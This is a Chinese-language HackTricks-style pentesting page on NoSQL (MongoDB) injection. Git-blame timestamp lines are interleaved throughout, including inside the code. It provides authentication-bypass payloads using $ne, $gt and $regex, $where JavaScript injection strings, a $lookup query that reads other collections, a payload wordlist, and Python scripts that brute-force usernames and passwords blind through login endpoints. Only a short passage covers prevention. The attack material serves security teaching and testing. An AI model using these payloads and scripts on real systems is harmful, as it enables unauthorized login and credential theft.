2024-01-14 22:49:53 +00:00
# NoSQL注入
2022-04-28 16:01:33 +00:00
2024-01-10 06:29:36 +00:00
< figure > < img src = "../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-08-31 22:35:39 +00:00
2023-09-28 19:47:23 +00:00
\
2024-02-06 04:10:34 +00:00
使用[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks)可以轻松构建并通过世界上**最先进**的社区工具**自动化工作流程**。\
2023-08-03 19:12:22 +00:00
立即获取访问权限:
2022-08-31 22:35:39 +00:00
{% embed url="https://trickest.com/?utm_campaign=hacktrics& utm_medium=banner& utm_source=hacktricks" %}
2022-04-28 16:01:33 +00:00
< details >
2024-02-06 04:10:34 +00:00
< summary > < strong > 从零开始学习AWS黑客技术, 成为专家< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE( HackTricks AWS Red Team Expert) < / strong > < / a > < strong > ! < / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-06 04:10:34 +00:00
支持HackTricks的其他方式:
2023-12-31 04:43:12 +00:00
2024-02-06 04:10:34 +00:00
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品
2024-02-09 08:09:21 +00:00
* **加入** 💬 [**Discord群** ](https://discord.gg/hRep4RUj7f ) 或 [**电报群** ](https://t.me/peass ) 或在**Twitter**上关注我们 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks_live )**。**
2024-02-06 04:10:34 +00:00
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
2022-04-28 16:01:33 +00:00
< / details >
2020-07-15 15:43:14 +00:00
2023-12-31 04:43:12 +00:00
## 利用
2020-07-15 15:43:14 +00:00
2024-03-03 09:50:12 +00:00
在PHP中, 您可以通过将发送的参数从_parameter=foo_更改为_parameter\[arrName\]=foo_来发送一个数组。
2020-07-15 15:43:14 +00:00
2024-02-09 08:09:21 +00:00
这些利用是基于添加一个**运算符**:
2020-07-15 15:43:14 +00:00
```bash
username[$ne]=1$password[$ne]=1 #< Not Equals >
username[$regex]=^adm$password[$ne]=1 #Check a < regular expression > , could be used to brute-force a parameter
username[$regex]=.{25}& pass[$ne]=1 #Use the < regex > to find the length of a value
2021-04-19 22:42:22 +00:00
username[$eq]=admin& password[$ne]=1 #< Equals >
2020-07-15 15:43:14 +00:00
username[$ne]=admin& pass[$lt]=s #< Less than > , Brute-force pass[$lt] to find more users
username[$ne]=admin& pass[$gt]=s #< Greater Than >
username[$nin][admin]=admin& username[$nin][test]=test& pass[$ne]=7 #< Matches non of the values of the array > (not test and not admin)
{ $where: "this.credits == this.debits" }#< IF > , can be used to execute code
```
2024-01-15 11:20:12 +00:00
### 基本身份验证绕过
2020-07-15 15:43:14 +00:00
2024-02-06 04:10:34 +00:00
**使用不等于 ($ne) 或大于 ($gt)**
2020-07-15 15:43:14 +00:00
```bash
#in URL
username[$ne]=toto& password[$ne]=toto
2021-06-26 15:50:17 +00:00
username[$regex]=.*& password[$regex]=.*
2020-07-15 15:43:14 +00:00
username[$exists]=true& password[$exists]=true
#in JSON
{"username": {"$ne": null}, "password": {"$ne": null} }
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"} }
{"username": {"$gt": undefined}, "password": {"$gt": undefined} }
```
2023-08-03 19:12:22 +00:00
### **SQL - Mongo**
2024-02-06 04:10:34 +00:00
2024-02-09 08:09:21 +00:00
#### **NoSQL注入**
2024-03-03 09:50:12 +00:00
在MongoDB中, NoSQL注入是一种利用应用程序对数据库查询的处理方式不当而导致的安全漏洞。与传统的SQL注入攻击不同, NoSQL注入利用了NoSQL数据库的查询语言特性, 例如MongoDB的JSON文档查询语言。攻击者可以通过在查询中插入恶意代码来绕过身份验证、访问敏感数据或执行未经授权的操作。为了防止NoSQL注入, 开发人员应该使用参数化查询、输入验证和最小权限原则等安全措施。
2024-01-10 06:29:36 +00:00
```javascript
query = { $where: `this.username == '${username}'` }
```
2024-03-03 09:50:12 +00:00
攻击者可以通过输入类似于 `admin' || 'a'=='a` 的字符串来利用此漏洞,使查询返回所有满足重言(`'a'=='a'`)条件的文档。这类似于 SQL 注入攻击,其中使用 `' or 1=1-- -` 等输入来操纵 SQL 查询。在 MongoDB 中,可以使用类似于 `' || 1==1//` 、`' || 1==1%00` 或 `admin' || 'a'=='a` 的输入来执行类似的注入。
2023-09-03 18:16:18 +00:00
```
Normal sql: ' or 1=1-- -
2024-01-10 06:29:36 +00:00
Mongo sql: ' || 1==1// or ' || 1==1%00 or admin' || 'a'=='a
2023-09-03 18:16:18 +00:00
```
### 提取**长度**信息
2020-07-15 15:43:14 +00:00
```bash
username[$ne]=toto& password[$regex]=.{1}
username[$ne]=toto& password[$regex]=.{3}
# True if the length equals 1,3...
```
2023-08-03 19:12:22 +00:00
### 提取**数据**信息
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
in URL (if length == 3)
username[$ne]=toto& password[$regex]=a.{2}
username[$ne]=toto& password[$regex]=b.{2}
...
username[$ne]=toto& password[$regex]=m.{2}
username[$ne]=toto& password[$regex]=md.{1}
username[$ne]=toto& password[$regex]=mdp
username[$ne]=toto& password[$regex]=m.*
username[$ne]=toto& password[$regex]=md.*
in JSON
{"username": {"$eq": "admin"}, "password": {"$regex": "^m" }}
{"username": {"$eq": "admin"}, "password": {"$regex": "^md" }}
{"username": {"$eq": "admin"}, "password": {"$regex": "^mdp" }}
```
2023-08-03 19:12:22 +00:00
### **SQL - Mongo**
2024-02-06 04:10:34 +00:00
2024-03-03 09:50:12 +00:00
#### **NoSQL Injection**
NoSQL databases like MongoDB are also vulnerable to injection attacks. The injection techniques used in NoSQL databases are different from those used in traditional SQL databases. In NoSQL databases, attackers can exploit vulnerabilities like insecure object references, injection flaws, and query language injection to manipulate the database and retrieve sensitive information.
#### **NoSQL Injection Payloads**
Attackers can use payloads like the following to perform NoSQL injection attacks:
- **Payload 1:** `{"username": {"$gt": ""}, "password": {"$gt": ""}}`
- **Payload 2:** `{"$ne": null}`
- **Payload 3:** `{"$where": "function() { return true; }"}`
#### **Preventing NoSQL Injection**
To prevent NoSQL injection attacks, developers should:
- Validate and sanitize user input.
- Use parameterized queries or Object-Document Mapping (ODM) libraries.
- Implement proper access control and authentication mechanisms.
- Limit the privileges of database users to reduce the impact of a successful injection attack.
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
/?search=admin' & & this.password%00 --> Check if the field password exists
/?search=admin' & & this.password & & this.password.match(/.*/)%00 --> start matching password
/?search=admin' & & this.password & & this.password.match(/^a.*$/)%00
/?search=admin' & & this.password & & this.password.match(/^b.*$/)%00
/?search=admin' & & this.password & & this.password.match(/^c.*$/)%00
...
/?search=admin' & & this.password & & this.password.match(/^duvj.*$/)%00
...
/?search=admin' & & this.password & & this.password.match(/^duvj78i3u$/)%00 Found
```
2024-02-06 04:10:34 +00:00
### PHP任意函数执行
2020-07-15 15:43:14 +00:00
2024-03-03 09:50:12 +00:00
使用[MongoLite](https://github.com/agentejo/cockpit/tree/0.11.1/lib/MongoLite)库的**$func**运算符(默认使用)可能会导致像[这份报告](https://swarm.ptsecurity.com/rce-cockpit-cms/)中描述的执行任意函数的可能性。
2021-04-30 09:16:21 +00:00
```python
"user":{"$func": "var_dump"}
```
2024-02-06 04:10:34 +00:00
![https://swarm.ptsecurity.com/wp-content/uploads/2021/04/cockpit_auth_check_10.png ](<../.gitbook/assets/image (468 ).png>)
2021-04-30 09:16:21 +00:00
2024-02-06 04:10:34 +00:00
### 从不同集合获取信息
2023-03-23 14:03:29 +00:00
2024-03-03 09:50:12 +00:00
可以使用[$lookup](https://www.mongodb.com/docs/manual/reference/operator/aggregation/lookup/)从不同的集合中获取信息。在下面的示例中,我们从一个名为`users`的**不同集合**中读取数据,并获取所有密码与通配符匹配的**条目的结果**。
**注意:** 只有在执行搜索时使用`aggregate()`函数而不是更常见的`find()`或`findOne()`函数时,才能使用`$lookup`和其他聚合函数。
2023-03-23 14:03:29 +00:00
```json
[
2023-08-03 19:12:22 +00:00
{
"$lookup":{
"from": "users",
"as":"resultado","pipeline": [
{
"$match":{
"password":{
"$regex":"^.*"
}
}
}
]
}
}
2023-03-23 14:03:29 +00:00
]
```
2024-01-10 06:29:36 +00:00
< figure > < img src = "../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-08-31 22:35:39 +00:00
2024-02-06 04:10:34 +00:00
\
2024-03-03 09:50:12 +00:00
使用[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks)轻松构建和**自动化工作流**,利用世界上**最先进**的社区工具。\
2023-08-03 19:12:22 +00:00
立即获取访问权限:
2022-08-31 22:35:39 +00:00
{% embed url="https://trickest.com/?utm_campaign=hacktrics& utm_medium=banner& utm_source=hacktricks" %}
2024-02-06 04:10:34 +00:00
## MongoDB 负载
列表[从这里](https://github.com/cr0hn/nosqlinjection_wordlists/blob/master/mongodb_nosqli.txt)
```
true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1
1, $where: '1 == 1'
{ $ne: 1 }
', $or: [ {}, { 'a':'a
' } ], $comment:'successful MongoDB injection'
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
|| 1==1//
|| 1==1%00
}, { password : /.*/ }
' & & this.password.match(/.*/)//+%00
' & & this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
{$gt: ''}
[$ne]=1
';sleep(5000);
';it=new%20Date();do{pt=new%20Date();}while(pt-it< 5000 ) ;
{"username": {"$ne": null}, "password": {"$ne": null}}
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"}}
{"username": {"$gt": undefined}, "password": {"$gt": undefined}}
{"username": {"$gt":""}, "password": {"$gt":""}}
{"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}}
```
## 盲注 NoSQL 脚本
2020-07-15 15:43:14 +00:00
```python
import requests, string
alphabet = string.ascii_lowercase + string.ascii_uppercase + string.digits + "_@{}-/()!\"$%=^[]:;"
flag = ""
for i in range(21):
2023-08-03 19:12:22 +00:00
print("[i] Looking for char number "+str(i+1))
for char in alphabet:
r = requests.get("http://chall.com?param=^"+flag+char)
if ("< TRUE > " in r.text):
flag += char
print("[+] Flag: "+flag)
break
2020-07-15 15:43:14 +00:00
```
```python
import requests
import urllib3
import string
import urllib
urllib3.disable_warnings()
username="admin"
password=""
while True:
2023-08-03 19:12:22 +00:00
for c in string.printable:
if c not in ['*','+','.','?','|']:
payload='{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (username, password + c)
r = requests.post(u, data = {'ids': payload}, verify = False)
if 'OK' in r.text:
print("Found one more char : %s" % (password+c))
password += c
2020-07-15 15:43:14 +00:00
```
2023-08-03 19:12:22 +00:00
### 从POST登录中暴力破解用户名和密码
2020-07-15 15:43:14 +00:00
2024-02-09 08:09:21 +00:00
这是一个简单的脚本,您可以修改,但之前的工具也可以执行此任务。
2020-07-15 15:43:14 +00:00
```python
import requests
import string
url = "http://example.com"
headers = {"Host": "exmaple.com"}
cookies = {"PHPSESSID": "s3gcsgtqre05bah2vt6tibq8lsdfk"}
possible_chars = list(string.ascii_letters) + list(string.digits) + ["\\"+c for c in string.punctuation+string.whitespace ]
def get_password(username):
2023-08-03 19:12:22 +00:00
print("Extracting password of "+username)
params = {"username":username, "password[$regex]":"", "login": "login"}
password = "^"
while True:
for c in possible_chars:
params["password[$regex]"] = password + c + ".*"
pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False)
if int(pr.status_code) == 302:
password += c
break
if c == possible_chars[-1]:
print("Found password "+password[1:].replace("\\", "")+" for username "+username)
return password[1:].replace("\\", "")
2020-07-15 15:43:14 +00:00
2024-01-14 22:49:53 +00:00
def get_usernames(prefix):
2023-08-03 19:12:22 +00:00
usernames = []
2024-01-14 22:49:53 +00:00
params = {"username[$regex]":"", "password[$regex]":".*"}
2023-08-03 19:12:22 +00:00
for c in possible_chars:
2024-01-14 22:49:53 +00:00
username = "^" + prefix + c
2023-08-03 19:12:22 +00:00
params["username[$regex]"] = username + ".*"
pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False)
if int(pr.status_code) == 302:
print(username)
2024-01-14 22:49:53 +00:00
for user in get_usernames(prefix + c):
usernames.append(user)
2023-08-03 19:12:22 +00:00
return usernames
2020-07-15 15:43:14 +00:00
2024-01-14 22:49:53 +00:00
for u in get_usernames(""):
2023-08-03 19:12:22 +00:00
get_password(u)
2020-07-15 15:43:14 +00:00
```
2024-02-06 04:10:34 +00:00
## 工具
* [https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration ](https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration )
* [https://github.com/C4l1b4n/NoSQL-Attack-Suite ](https://github.com/C4l1b4n/NoSQL-Attack-Suite )
2023-08-03 19:12:22 +00:00
## 参考资料
2022-04-28 16:01:33 +00:00
2022-08-31 22:35:39 +00:00
* [https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L\_2uGJGU7AVNRcqRvEi%2Fuploads%2Fgit-blob-3b49b5d5a9e16cb1ec0d50cb1e62cb60f3f9155a%2FEN-NoSQL-No-injection-Ron-Shulman-Peleg-Bronshtein-1.pdf?alt=media ](https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L\_2uGJGU7AVNRcqRvEi%2Fuploads%2Fgit-blob-3b49b5d5a9e16cb1ec0d50cb1e62cb60f3f9155a%2FEN-NoSQL-No-injection-Ron-Shulman-Peleg-Bronshtein-1.pdf?alt=media )
2022-09-09 11:00:52 +00:00
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection ](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection )
2024-02-06 04:10:34 +00:00
* [https://nullsweep.com/a-nosql-injection-primer-with-mongo/ ](https://nullsweep.com/a-nosql-injection-primer-with-mongo/ )
* [https://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb ](https://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb )
2022-04-28 16:01:33 +00:00
< details >
2024-03-03 09:50:12 +00:00
< summary > < strong > 从零开始学习AWS黑客技术< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2023-12-31 04:43:12 +00:00
2024-01-15 11:20:12 +00:00
支持HackTricks的其他方式:
2022-04-28 16:01:33 +00:00
2024-02-06 04:10:34 +00:00
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF版本的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
2024-03-03 09:50:12 +00:00
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组** ](https://discord.gg/hRep4RUj7f ) 或 [**电报群组** ](https://t.me/peass ) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks_live )**.**
2024-02-06 04:10:34 +00:00
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
2022-04-28 16:01:33 +00:00
< / details >
2024-01-10 06:29:36 +00:00
< figure > < img src = "../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-08-31 22:35:39 +00:00
\
2024-02-09 08:09:21 +00:00
使用[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks)轻松构建和**自动化工作流程**,由全球**最先进**的社区工具驱动。\
2023-08-03 19:12:22 +00:00
立即获取访问权限:
2022-04-28 16:01:33 +00:00
2022-08-31 22:35:39 +00:00
{% embed url="https://trickest.com/?utm_campaign=hacktrics& utm_medium=banner& utm_source=hacktricks" %}